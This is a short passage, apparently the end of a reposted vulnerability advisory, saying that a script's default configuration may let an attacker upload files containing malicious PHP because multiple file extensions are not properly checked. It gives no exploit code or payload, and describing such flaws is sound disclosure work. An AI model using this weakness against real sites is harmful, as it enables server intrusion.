with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked
=========================| -=[ E0F ]=- |=================================
Subscribe to:
Posts (Atom)